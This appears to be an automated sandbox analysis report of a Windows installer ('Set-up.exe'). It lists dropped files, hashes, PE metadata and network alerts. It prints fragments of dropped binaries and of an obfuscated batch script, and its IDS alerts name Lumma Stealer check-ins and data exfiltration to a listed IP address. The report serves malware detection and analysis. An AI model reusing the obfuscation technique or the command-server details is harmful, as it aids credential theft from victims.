                                    Preview:..Z.tB...0.......M"z.l.].....}.7{.0.-.{B.^.b..5..wV).y.J......g.}.G }.R2#.:......_L...6uW.l.1.R...%.t0.5.A+...a...$.^...Z.1...j.k.&)..c.gHg..>tv..E.PA........<..8k....r.9&.g...s...n.|X........B..h.@. *..2_....B..S7 sB..s.2................&..De..577..Xr.N...<lR8...RL0........A..bH.Uu../...E.?....@.OJ...!j.......=.h.44..a..X.J.ST_.q.........0.K&E.L(..;)...W].v..%.ny.6.6+t.L...6...l.....m....)..>MZ)V.V..B.&..CY...g].o.)...5..Fw.{..$......@...9..L....'Y....R...Y...\.f6D?KKP..dm.`R..?.\$x...w..rgxp.z...H0..q.?...T.8.V...I.).~m+....F..U..$..e$#.P...I.P...y.:....M=Z.n.9..V.]e.PBZs{LI...........=....Q..@.3=.>D0.b.Y?.....].Z/..R.......m...P..t.......gt?x......].>I.Jc.N....k..eX.."qLyW~o.No...M.......E.....6s..,n.x.-..a.....,.>..i....H.k..V..eP.PH..............!..;l.G.g\?*.....D...y.......m.._..,......;'.UZ_..4=....k..f..sY.z.....@<PG..7p3i...,.v.!.{..:y#al.)...((>XE...H..Z[.3...@.cq...V.8.[...~....Z|5"P.b.6A..l..Ei5.@...UNI...:5Q%.^=..c_ |2

                                    C:\Users\user\AppData\Local\Temp\Phones

                                    Download File
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):147456
                                    Entropy (8bit):6.0641104409794195
                                    Encrypted:false
                                    SSDEEP:3072:mde6u640ewy4Za9coRC2jfTq8QLeAg0Fuz08XvBNbjaAtsPE:md314V14ZgP0JaAOz04phdys
                                    MD5:FC7DE2747566FFE429E758B1D7503D9D
                                    SHA1:C75D37BDA5E7535888720B599568A81326AAF3E9
                                    SHA-256:4F0E3AB854F8A3A11FAE4C33D82E22C2468CC0C7BA36E6211C1262E3A6382C8E
                                    SHA-512:B047D46FACD90662F5E00F43C25CB2853D4970E0FE1BB7AF6282812DB34F58E141EBA695E4DD48882127DFA6C2052FC77B6EA352197E3F7B2F10C21F7E2E6C90
                                    Malicious:false
                                    Preview:.u...j.Q.u.RV.u..u..u.Qh..I.hh.L.PV.M)...}.....u.2.....3.9.....t.j.QQQQQP....I...........t!j..7........\.I......Pj..7..@.I..~8.t,.^..E(P.E,P.u..q...u(.u,........t.S.u,............3........@.=.(M..u.f......_^[].(.U...x.E.SVWP.E.P.u..Mq...........M.3.@)M......9........................E.......y...x..E.'....U.U..x..M..x..E.E..u.E.}..E.j..E.Y.......E.......t..E..M..T)M...............u......H4.M....u..E........@..E..}..E..5H.I.Pj.h2...Q..j.j..G..E.h....P.G4..f.......G...........2._^[....U..E....u.j.X..u....SVW...P.x:...u.3.SQ.u.SSSSPSh(.L.SV.E'.............u....Y.....M.Q.M.QP..o....t_.M..@)M........;.uL.U..T)M.............u6.M..5H.I.S.9.T)M........Phi...W.A4..h....She...W.....W..<.I.2._^[]...U..QQ.E.P.E.P.u.._o....u.3....M..T)M..u..u.....u....0..H.I.....U..V.u..>.t..~..u.h..I.j..6..@.I..F.^]...U...8.E.P.E.P.u...n....tz.M..T)M............<.wAtQ<.vM<.t2<.uU.E..E.0...Pj..u..E......q.....I...t1.M..E...#.I...<.t.v.<.v.<.v.<.w......I..E.......2.....U..QQ.E.P.E.P.u..]n....u.....

                                    C:\Users\user\AppData\Local\Temp\Scroll

                                    Download File
                                    Process:C:\Users\user\Desktop\Set-up.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):2269
                                    Entropy (8bit):7.928033904786583
                                    Encrypted:false
                                    SSDEEP:48:6c9xsYRC1WoUfdJARzQYfqebH7CXE0BRfMHE6n2TN4cHCctEMcHYNA7u90:riuCWtARz9NHmXEifi2CctEMUc7i
                                    MD5:D8E19D94F4301DB815991F36B4FF3564
                                    SHA1:F92AF4FBACB433B0AC699B9594FC33C3EDBA9D18
                                    SHA-256:BCFBFE88AE3C2F3021FF0B6C342144D73FAA7D1E68500DBA46FF78930D52BAAE
                                    SHA-512:62D267CAB6E5479B5502BE42A385C04C274036A936FDB33123521B7767DF6D48D0C430451BB63B89830C97FBC0777A821FDA1D19F924A7D8EEB4921B92F25DB6
                                    Malicious:false
                                    Preview:..f.....7m5e..1.9'.,..l....gA)]..Ua...6.....;..t}....<.p...W}n.z{.0.B.gQ.F.^&C].U.^".._B6T.}w.....b.N.W. .SB]....5...~.2Y.G..<....5.y...V.'....n.-\...?T..`.Z..p...{.9.Hv..1G.kh......h.....F5z.........[..f}B...=.+...fa...8..WE.AR.:|.GBs.|...hp[g{...........UVC._l2.~...W.U...ZQKU...:V..f....,..x...b.A8...ec\.+@.K..5..=H....x..5.....aK...9.W..a9.8...{ ...n.o....B.;H.....}%.......Vm.v./.....G..z...!..c.y...).F.;.).>..y];.).B<...\.I<....8.-..\q...,gm.]....,.U.....JNW....B.LP.... .(.-..N;4 .V.zbPf..e`.)...........g..OH.K..n...6......[C2.@a.R.p.ja.gc.....BF...5[5..Q(u.....FF...t.t.&. .a.X...@.mC..j.[j...o...OK..7..{8".S.e~V.C.....w...?t...X.....A....C...$...../}1-.O..30.]..+.K....Rz.H......#.W..O.j.x.R..]...Ku....[...D(cZ.=...3`LZ.D.>.R.H.F.em...>...N.....K1aT1i.../.9..&..(.[.4...+..I.8..@....[.5.r.w.4.....-u"~......T........5.....+0.V-.\h.....5;.r.'w./..9y.....z._....Qvx.C...Q...Y..(?FJ...9.X.......Q.K..v..A..Lc79)..b....+9..|....59......b

                                    C:\Users\user\AppData\Local\Temp\Sensor

                                    Download File
                                    Process:C:\Users\user\Desktop\Set-up.exe
                                    File Type:OpenPGP Public Key
                                    Category:dropped
                                    Size (bytes):71680
                                    Entropy (8bit):7.997341384759921
                                    Encrypted:true
                                    SSDEEP:1536:Zz9lP9uttJQJnUVpT1yNhOUWdCLemGwpQYMh7MR+y:XbwJQJnopGWdCPs4
                                    MD5:B241CF18A38F91C89560DB8B15B13B99
                                    SHA1:6B3DD4A1E2268B9E2D0D890CB9FCCB6ED5782EE6
                                    SHA-256:F778B71D7F9863A3C01CDBF8EF975FB23306E47A966C4D00525BBB2B8C3D4DCA
                                    SHA-512:1EA80EAA676E3ED025E797231157FC01E163AFCE55245D64886283D1053197E392C1186AEAC9C3410F5C587365C9299D555CF1D83282F88E202FD8DDE3862C5C
                                    Malicious:false
                                    Preview:..`..)I...{.._~c...|...,.is2D..#....?...|$.b.......X..W..*..%....t....q..^.;.V.&....+C....gNC3..:..K...T.#DC....&HS=g!l.q.....T....3...S.J.#......y.......j......I...m.V$*..2.t.;#.q2.A.}..E[.I..U...Y(.X.....i.y.o2(r........s.5.+y..n.RO.UFXm....YU..Vu.9..g...F".o.L"x0.r{{j...G..9.....\who+..e4..yNa.I.....:..$Y.s..z..l.M]...N.....$1g..~K.....}d...%.}.r.K{Q...K..`..%qG...),qg..!.F!u$.......y.c.'...H.r...%.8..-B..?.Z..0......."D+. .m8..5..u=W..".#......@.-....B..(.9...%}A.dr,t.[K.....xFU...Ch.s..N......S.....BOO.........!.;DFvE..R..0....J..U.H.n....QV....i...$.h.LM....)..;@.K)o.!....>j.#*.pg.;...P.a'..DE...`..k......9...Sx.TJ]..w..f.A........8.T. .?q...~.o/.H..4..M\:.4...u.U..._z...\_..5...../...}].}....\....yu3.f..0,... .(.f.u[h...A..!/(..d^;5o...........F#6V.J.....:.<w...t3........f{...>y^H.'..h..j..ix....-U.....su..P...* .})J<P9.~864...zM<.85.-vD..c...u|N.p....j$F...%.J.~.RL.\]L~.(%'...7^|..........ABU70..0z_......\.....i..(..D..Y..".?5(4)....

                                    C:\Users\user\AppData\Local\Temp\Sharing

                                    Download File
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):776
                                    Entropy (8bit):3.988783141312099
                                    Encrypted:false
                                    SSDEEP:12:2jOyGSG+fCtJfjEvadTfA43k66h1ICdC3v6clC1:26yGS9PvCA433C+sCNC1
                                    MD5:498D5797F011D1FB08D92FF83A0697C9
                                    SHA1:DB13942EF1A85C6CFF292C0F8DE6CB5A0EA07C4E
                                    SHA-256:C10F235E3F488A6CA6DB40202837453E85028F1FF8FF89FB3CDA8D1ADB3EFF12
                                    SHA-512:6AD082B4926B56586701CD8F5A52A07E535277644B44052AF2A21D040676A0A0C0423A61853A2D5CDF40C9DFC7185BF8887E14AD51FB9713CECB642BFF1FB46B
                                    Malicious:false
                                    Preview:Subsidiary........................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B......................................

                                    C:\Users\user\AppData\Local\Temp\Strap

                                    Download File
                                    Process:C:\Windows\SysWOW64\extrac32.exe
                                    File Type:data
                                    Category:dropped
                                    Size (bytes):129024
                                    Entropy (8bit):6.700002454778713
                                    Encrypted:false
                                    SSDEEP:3072:U5mjccBiqXvpgF4qv+32eOyKODOSpQSAU4C0:UaccB3gBmmLsiS+SAhC0
                                    MD5:9A5D257F7B1AFB7A5B05C7FA0DCAD762
                                    SHA1:C657A574D01279D2FA0ECA913CA4900481CDD3AE
                                    SHA-256:393F698E4815E394E86F7C6BDAF0E04BEDBFBBA4162D988229B8BB54D3BCCF42
                                    SHA-512:8C6D411ADDE1C64F2350D4F68B3278375D7A486ABD138EB87E46CA3D837181EB3016670D4534CB49544018737C50F054C8B0E1F5E1EBF333EC6230CB5D8F92E0
                                    Malicious:false
                                    Preview:.j.h..L......e...MZ..f9...@.u].<.@.....@.PE..uL.....f9...@.u>.E....@.+.PQ.^...YY..t'.x$.|!.E..........E..3.8..........e..E.....2..M.d......Y_^[..U.........t..}..u.3....M...].U..=..M..t..}..u..u..."...u..[,..YY..].U....L...3...M.....u.....u...!....h..M..l!..Y..Y....#E.].U...u.......Y....H].U...u..Q...Y].."...j......Y..t.hL.B......Y3..j..S....U..j.h3'D.d.....PSVW...L.3.P.E.d.....h....h..M...8.I.h..J.....I.....u.h,.J.....I...........hH.J.V....I.hd.J.V......I.h..J.V......I.....t8..t4..t0.%(.M....h$.M.....I...W....V.,.M..y...YY.0.M...3.PPj.P....I..(.M...t..M.d......Y_^[..j..d....h..M...<.I..(.M...t.P..`.I..U..V...M.V..h.I.....L..E.A....L.V..d.,.....@.M.......L.........\.I.^].R...U..VW...M.W..h.I..u..>.u.....)jd.o...Y..>.t.d.,.....@.M.......L.......W..\.I._^].(.M...u%V.5..L...350.M......h$.M.......I...^.P....I..5(.M...H.I..U..=(.M..Vu,.5..L....u.35,.M....h..M...h$.M.......I....$...M.V..\.I.j..u..5(.M...L.I.V..h.I.^].Vj... .......P......3".....:...j..........^..ts...9...hB.B..,..

                                    C:\Users\user\AppData\Local\Temp\Tool

                                    Download File
                                    Process:C:\Users\user\Desktop\Set-up.exe
                                    File Type:ASCII text, with very long lines (518), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):11635
                                    Entropy (8bit):5.177172642553435
                                    Encrypted:false
                                    SSDEEP:192:SQ6NqdAd7NUxg5sn5JwUZ636j0esvbWvipGqVK1GvTIya50XK6M/Byi:8NeAPUxSsn562tjnSWvibK1BR0HM/BD
                                    MD5:09A8EA9FF64DB95A2E1583FD12D1766B
                                    SHA1:9545B9928EBB260CC62C7B904343B4D9DA7DBB89
                                    SHA-256:DAFAB4E1C26837AEF449DD6B291CFEB09FF7F54601A1D0043CBAFDD7A0057874
                                    SHA-512:23346350C5BCF53CFC4AF4AA06036765C30E584E7087743BB26E236A70F300F131122F24C6AD68A01DAD0FE3AA89D82D8C938C58CD6BE84BABDA83696AC02E72
                                    Malicious:false
                                    Preview:Set Broadcasting=S..jBjtOperation-Charles-Categories-Investigators-Dates-Video-Agency-Accurately-Changed-..NPZiVe-..xFfsDiscussion-Whale-Continued-Tanks-Fool-..LTBox-Scripts-Enabling-Clearance-Amplifier-Rick-..MEqReligious-Judges-..Set Joint=y..EiVariations-Fool-Interventions-Blades-Void-Compute-Worked-..boGalleries-Il-Transformation-Followed-Ddr-Van-Steal-Fisting-Suffer-..dxBoats-Fired-..uZEugene-..NNWarcraft-Against-Mental-Addition-Brazil-Bold-Guides-..Set Buddy=J..siVoters-..wKoLSwiss-Customs-Jonathan-Porcelain-Professionals-..wgHack-Imperial-..nzoFo-..oEMike-Close-Northwest-Charitable-..kkzvCourts-Approx-Rap-Success-Swap-..hfTSAdverse-Addressing-Mouse-Rehabilitation-Posters-Photograph-Seeker-..Set Says=K..mFEcWebmasters-Schools-Egyptian-Guns-..eiRoller-Vocabulary-Target-Cup-Cameron-Hyundai-Reproduced-..NnNgRebound-Lost-Successfully-Frank-..fLgPitch-Pb-Improvement-Invoice-Aurora-Liable-Pittsburgh-..bfLGCables-Stamps-Dui-..CWRegistry-Captain-Simultaneously-Bundle-Wrap-Departmental-Di

                                    C:\Users\user\AppData\Local\Temp\Tool.cmd (copy)

                                    Download File
                                    Process:C:\Windows\SysWOW64\cmd.exe
                                    File Type:ASCII text, with very long lines (518), with CRLF line terminators
                                    Category:dropped
                                    Size (bytes):11635
                                    Entropy (8bit):5.177172642553435
                                    Encrypted:false
                                    SSDEEP:192:SQ6NqdAd7NUxg5sn5JwUZ636j0esvbWvipGqVK1GvTIya50XK6M/Byi:8NeAPUxSsn562tjnSWvibK1BR0HM/BD
                                    MD5:09A8EA9FF64DB95A2E1583FD12D1766B
                                    SHA1:9545B9928EBB260CC62C7B904343B4D9DA7DBB89
                                    SHA-256:DAFAB4E1C26837AEF449DD6B291CFEB09FF7F54601A1D0043CBAFDD7A0057874
                                    SHA-512:23346350C5BCF53CFC4AF4AA06036765C30E584E7087743BB26E236A70F300F131122F24C6AD68A01DAD0FE3AA89D82D8C938C58CD6BE84BABDA83696AC02E72
                                    Malicious:false
                                    Preview:Set Broadcasting=S..jBjtOperation-Charles-Categories-Investigators-Dates-Video-Agency-Accurately-Changed-..NPZiVe-..xFfsDiscussion-Whale-Continued-Tanks-Fool-..LTBox-Scripts-Enabling-Clearance-Amplifier-Rick-..MEqReligious-Judges-..Set Joint=y..EiVariations-Fool-Interventions-Blades-Void-Compute-Worked-..boGalleries-Il-Transformation-Followed-Ddr-Van-Steal-Fisting-Suffer-..dxBoats-Fired-..uZEugene-..NNWarcraft-Against-Mental-Addition-Brazil-Bold-Guides-..Set Buddy=J..siVoters-..wKoLSwiss-Customs-Jonathan-Porcelain-Professionals-..wgHack-Imperial-..nzoFo-..oEMike-Close-Northwest-Charitable-..kkzvCourts-Approx-Rap-Success-Swap-..hfTSAdverse-Addressing-Mouse-Rehabilitation-Posters-Photograph-Seeker-..Set Says=K..mFEcWebmasters-Schools-Egyptian-Guns-..eiRoller-Vocabulary-Target-Cup-Cameron-Hyundai-Reproduced-..NnNgRebound-Lost-Successfully-Frank-..fLgPitch-Pb-Improvement-Invoice-Aurora-Liable-Pittsburgh-..bfLGCables-Stamps-Dui-..CWRegistry-Captain-Simultaneously-Bundle-Wrap-Departmental-Di

                                    Static File Info

                                    General

                                    File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                    Entropy (8bit):4.523481259499741
                                    TrID:
                                    • Win32 Executable (generic) a (10002005/4) 99.96%
                                    • Generic Win/DOS Executable (2004/3) 0.02%
                                    • DOS Executable Generic (2002/1) 0.02%
                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                    File name:Set-up.exe
                                    File size:73'414'381 bytes
                                    MD5:91e7814911367eb7cbfa0e57f9beeaf8
                                    SHA1:8c36ea6c6a191d819f20af8c12528fa0cb634295
                                    SHA256:f49d0fd4dc1336729d23a5fdd9e30ec2c48b70adb526761cc5a7954def28a4f1
                                    SHA512:5165314b70ee0f46f301e9da83f0e6191912cc2a58d40480e9d24f7fc9273cad10dfc8e77686e456aab287eaf47a894dd9a65e878c1f82534ec8729a27b4bdb0
                                    SSDEEP:12288:l0gyuZ66+m63dsJNhk2/mlbuTYl+7vXVFvN/zsvISpatYinfvN4s5TMWDqn62bgv:Cert6tiNR/TTavVyhfFJTPDwjby
                                    TLSH:FDF79277E575222071F3583540A41EFBBFBD6A4251AC829272481B0E06CEE3B765FC6E
                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....

                                    File Icon

                                    Icon Hash:1970e0eafaec7843

                                    Static PE Info

                                    General

                                    Entrypoint:0x4038af
                                    Entrypoint Section:.text
                                    Digitally signed:true
                                    Imagebase:0x400000
                                    Subsystem:windows gui
                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                    Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                    TLS Callbacks:
                                    CLR (.Net) Version:
                                    OS Version Major:5
                                    OS Version Minor:0
                                    File Version Major:5
                                    File Version Minor:0
                                    Subsystem Version Major:5
                                    Subsystem Version Minor:0
                                    Import Hash:be41bf7b8cc010b614bd36bbca606973

                                    Authenticode Signature

                                    Signature Valid:false
                                    Signature Issuer:CN=GlobalSign GCC R45 EV CodeSigning CA 2020, O=GlobalSign nv-sa, C=BE
                                    Signature Validation Error:The digital signature of the object did not verify
                                    Error Number:-2146869232
                                    Not Before, Not After
                                    • 23/01/2024 10:24:28 12/03/2025 16:08:47
                                    Subject Chain
                                    • E=a.tozzi@entersrl.it, CN=Enter Srl, OU=Enter Srl, O=Enter Srl, STREET=VIA CARLO ALBERTO DALLA CHIESA 18, L=Grottammare, S=Ascoli Piceno, C=IT, OID.1.3.6.1.4.1.311.60.2.1.3=IT, SERIALNUMBER=01524500442, OID.2.5.4.15=Private Organization
                                    Version:3
                                    Thumbprint MD5:D5D66EA7AE498CF896CF422DE5426590
                                    Thumbprint SHA-1:232E8A3F99CB8B202BE4DD8A235590F838B29038
                                    Thumbprint SHA-256:9B04FC852CDCBDA62D870E4112459D2A2A30586909E0E76B77AFA5DDF6FBA631
                                    Serial:5600D74B2CE1156218EEA30D

                                    Entrypoint Preview

                                    Instruction
                                    sub esp, 000002D4h
                                    push ebx
                                    push ebp
                                    push esi
                                    push edi
                                    push 00000020h
                                    xor ebp, ebp
                                    pop esi
                                    mov dword ptr [esp+18h], ebp
                                    mov dword ptr [esp+10h], 0040A268h
                                    mov dword ptr [esp+14h], ebp
                                    call dword ptr [00409030h]
                                    push 00008001h
                                    call dword ptr [004090B4h]
                                    push ebp
                                    call dword ptr [004092C0h]
                                    push 00000008h
                                    mov dword ptr [0047EB98h], eax
                                    call 00007F4BB908C5ABh
                                    push ebp
                                    push 000002B4h
                                    mov dword ptr [0047EAB0h], eax
                                    lea eax, dword ptr [esp+38h]
                                    push eax
                                    push ebp
                                    push 0040A264h
                                    call dword ptr [00409184h]
                                    push 0040A24Ch
                                    push 00476AA0h
                                    call 00007F4BB908C28Dh
                                    call dword ptr [004090B0h]
                                    push eax
                                    mov edi, 004CF0A0h
                                    push edi
                                    call 00007F4BB908C27Bh
                                    push ebp
                                    call dword ptr [00409134h]
                                    cmp word ptr [004CF0A0h], 0022h
                                    mov dword ptr [0047EAB8h], eax
                                    mov eax, edi
                                    jne 00007F4BB9089B7Ah
                                    push 00000022h
                                    pop esi
                                    mov eax, 004CF0A2h
                                    push esi
                                    push eax
                                    call 00007F4BB908BF51h
                                    push eax
                                    call dword ptr [00409260h]
                                    mov esi, eax
                                    mov dword ptr [esp+1Ch], esi
                                    jmp 00007F4BB9089C03h
                                    push 00000020h
                                    pop ebx
                                    cmp ax, bx
                                    jne 00007F4BB9089B7Ah
                                    add esi, 02h
                                    cmp word ptr [esi], bx

                                    Rich Headers

                                    Programming Language:
                                    • [ C ] VS2008 SP1 build 30729
                                    • [IMP] VS2008 SP1 build 30729
                                    • [ C ] VS2010 SP1 build 40219
                                    • [RES] VS2010 SP1 build 40219
                                    • [LNK] VS2010 SP1 build 40219

                                    Data Directories

                                    NameVirtual AddressVirtual Size Is in Section
                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xac400xb4.rdata
                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x1000000x3d0e.rsrc
                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x46000050x36e8
                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x860000x994.ndata
                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_IAT0x90000x2d0.rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                    Sections

                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                    .text0x10000x728c0x7400419d4e1be1ac35a5db9c47f553b27ceaFalse0.6566540948275862data6.499708590628113IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata0x90000x2b6e0x2c00cca1ca3fbf99570f6de9b43ce767f368False0.3678977272727273data4.497932535153822IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .data0xc0000x72b9c0x20077f0839f8ebea31040e462523e1c770eFalse0.279296875data1.8049406284608531IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .ndata0x7f0000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc0x1000000x3d0e0x3e0000b1383237c7828bbb22dbf15a98e09bFalse0.8068926411290323data6.975611251543485IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .reloc0x1040000xfd60x10007ce66dc4d1a2dca35f86de64e024e002False0.5693359375data5.318500909597628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                    Resources

                                    NameRVASizeTypeLanguageCountryZLIB Complexity
                                    RT_ICON0x1002080x21b9PNG image data, 64 x 64, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0012741804702885
                                    RT_ICON0x1023c40x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.5983606557377049
                                    RT_DIALOG0x1034ec0x100dataEnglishUnited States0.5234375
                                    RT_DIALOG0x1035ec0x11cdataEnglishUnited States0.6056338028169014
                                    RT_DIALOG0x1037080x60dataEnglishUnited States0.7291666666666666
                                    RT_GROUP_ICON0x1037680x22dataEnglishUnited States0.9411764705882353
                                    RT_VERSION0x10378c0x2acdataEnglishUnited States0.5146198830409356
                                    RT_MANIFEST0x103a380x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                    Imports

                                    DLLImport
                                    KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                    USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                    GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                    SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                    ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                    COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                    ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                    VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                    Possible Origin

                                    Language of compilation systemCountry where language is spokenMap
                                    EnglishUnited States

                                    Network Behavior

                                    Suricata IDS Alerts

                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                    2024-12-25T22:44:54.031217+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449738172.67.158.190443TCP
                                    2024-12-25T22:44:54.761975+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449738172.67.158.190443TCP
                                    2024-12-25T22:44:54.761975+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449738172.67.158.190443TCP
                                    2024-12-25T22:44:55.986825+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739172.67.158.190443TCP
                                    2024-12-25T22:44:56.793498+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449739172.67.158.190443TCP
                                    2024-12-25T22:44:56.793498+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449739172.67.158.190443TCP
                                    2024-12-25T22:44:58.268166+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449740172.67.158.190443TCP
                                    2024-12-25T22:44:59.182411+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449740172.67.158.190443TCP
                                    2024-12-25T22:45:00.607499+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741172.67.158.190443TCP
                                    2024-12-25T22:45:02.692006+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742172.67.158.190443TCP
                                    2024-12-25T22:45:05.173993+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744172.67.158.190443TCP
                                    2024-12-25T22:45:07.174641+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449751172.67.158.190443TCP
                                    2024-12-25T22:45:09.433794+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449757172.67.158.190443TCP
                                    2024-12-25T22:45:12.472873+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449763172.67.158.190443TCP

                                    Network Port Distribution

                                    TCP Packets

                                    TimestampSource PortDest PortSource IPDest IP
                                    Dec 25, 2024 22:44:52.809797049 CET49738443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:52.809891939 CET44349738172.67.158.190192.168.2.4
                                    Dec 25, 2024 22:44:52.809967995 CET49738443192.168.2.4172.67.158.190
                                    Dec 25, 2024 22:44:52.813132048 CET49738443192.168.2.4172.67.158.190
